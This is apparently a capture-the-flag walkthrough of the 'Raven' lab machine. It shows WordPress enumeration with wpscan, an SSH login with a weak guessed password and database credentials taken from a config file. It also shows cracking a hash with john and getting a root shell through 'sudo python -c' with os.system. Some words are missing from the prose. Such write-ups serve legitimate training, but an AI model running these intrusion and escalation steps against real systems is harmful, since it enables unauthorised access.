Raven Walkthrough



sudo wpscan --url http://192.168.1.6/wordpress --wp-content-dir wp-content --enumerate







michael@Raven:~$ sudo -l

[sudo] password for michael:

Sorry, user michael may not run sudo on raven.







michael@Raven:~$ find / -perm -4000 -user root 2> /dev/null

/bin/mount

/bin/umount

/bin/su

/usr/bin/procmail

/usr/bin/gpasswd

/usr/bin/chfn

/usr/bin/newgrp

/usr/bin/chsh

/usr/bin/passwd

/usr/bin/sudo

/usr/lib/openssh/ssh-keysign

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/eject/dmcrypt-get-device

/usr/sbin/sensible-mda

/sbin/mount.nfs







michael@Raven:~$ mysql -u root -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 15731

Server version: 5.5.60-0+deb8u1 (Debian)



Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.



Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.



Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.



mysql>







Some commands that I used find to credentials on mysql command line.

use [DATABASE]

show tables

show columns from [TABLE]

select [COLUMN] from [TABLE]







$echo 'steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/' > hash

$john hash

$john --show

steven:pink84







$ whoami

steven

$ sudo -l

Matching Defaults entries for steven on raven:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User steven may run the following commands on raven:

(ALL) NOPASSWD: /usr/bin/python







$ sudo python -c "from os import system;system('/bin/bash')"

root@Raven:/home/steven# whoami

root





Firstly, I should know Raven's ip address.So that, I fired up "netdiscover" and got the ip. Then, I go with nmap scan.I can see that open ports are 22,80 and 111. I'm starting with port 80 because of I don't have any usernames or other useful informations to start with SSH. When I connect to it, I saw good-looking 'Raven Security' website. I tried to catch something with manual way but this didn't work for me so I ran nikto.I'm interested in here withpart. When I navigate todirectory on the website, I got some error and to handle with it, I added website ip to /etc/hosts with as a name raven.local.Now, I can view to wordpress website correctly. If there is wordpress somewhere, we must think wpscan tool.I think, I catch two interesting parts in here. First one isand second one is. To exploit first vulnerability, I used metasploit module given us by on the rapid7 page. As a result, I spent a lot of time on this part and it gives me nothing.Now, we have got two usernames and SSH port. I used these usernames to login SSH and I succeed it with michael:michael creds. Now, I'm in the system as a michael so I should find a way to root or steven.I checked commands that we can run as a super user but it gave nothing.I checked SUID files but again it gave nothing. Then, I remembered this machine works wordpress on it. If I take a glance at wordpress config files, maybe I find something useful. I went wordpress directory underand I found mysql credential. (If you are curious about to find every flag in the machine,flag2.txt is under thedirectory, I noticed that after much.)Then,After that, I ran john to find out steven's password.Later, I used this credential to login SSH and I succeed it.It says, we can run python as a super user. Let's bypass it and be root.